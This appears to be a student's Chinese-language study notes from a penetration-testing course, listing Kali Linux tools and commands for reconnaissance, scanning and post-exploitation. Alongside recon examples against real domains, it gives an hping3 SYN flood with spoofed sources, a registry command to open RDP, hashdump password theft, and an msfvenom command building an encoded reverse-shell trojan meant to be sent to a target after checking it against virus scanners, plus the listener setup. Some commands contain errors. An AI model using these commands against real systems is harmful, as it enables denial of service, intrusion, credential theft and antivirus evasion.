bettercap ARP欺骗
DNS侦查
dnsmap 暴力猜解子域名
dmitry -wiens -o search.txt baidu.com 综合dns、域名信息、子域名 收集集合工具平台
recon-ng 暴力dns破解子域名 这个功能也不错 与shodan接口结合最好
IPS/IDS识别(入侵检测系统)
fragroute www.baidu.com 然后打开浏览器 就会去记录了
lbd baidu.com 检测网站负载均衡情况 只能检测nginx 现在基本被淘汰了
wafw00f www.baidu.com waf检测 好像也不太好用
枚举主机
atk6-alive6 etho(网卡) 只能扫描同局域网内IPV6地址主机
msf框架也有这功能
set rhosts ipv6地址
use auxiliary/scanner/discovery/ipv6_multicast_ping
show options
run
老师推荐好用的工具:hping3
hping3 --icmp -c 2 192.168.1.7 常规检测内网存活
hping3 -S --flood --rand-source -p 80 192.168.1.7 泛洪攻击
hping3 -1 ip
nmap 192.168.1.0/24 测试同一网段存活率
端口、服务器、服务的扫描(nmap)
指纹识别
系统识别
nmap -O 192.168.0.1
xprobe2 www.freebuf.com -p tcp:80:open
whatweb www.freebuf.com
masscan 大规模扫描 随机分配主机和速度 这个比较好
masscan 192.168.1.0/24 -p 80 --banners
综合工具:sparta 斯巴达 界面化工具 添加ip(段)即可 挺不错的
漏洞扫描和利用框架 openvas
web应用攻击和审计框架
W3AF 安装不是很友好 运行有点卡顿 暂时没有太多使用
msf 一套流程
后渗透重要命令: 通过注册表添加一条注册表信息开启3389端口 :REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DOWRD /d 00000000 /f
读取密码:search hashdump use一个利用模块 show options set sessions run 获取密码
远程桌面连接:rdesktop 192.168.0.1:3389
生成木马:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=自己ip LPORT=4444 -f exe > /root/xiee.exe
发给目标主机前 可以先去网上检测一下
然后在攻击机器上开启监听模块:msf5 > use exploit/multi/handler
设置payload: set payload windows/meterpreter/reverse_tcp 跟生成木马用的差不多的
设置自己的监听端口: set lport 192.168.188.255
开启:run
Armitage
界面化的msf 有时可能会有点卡顿和迟缓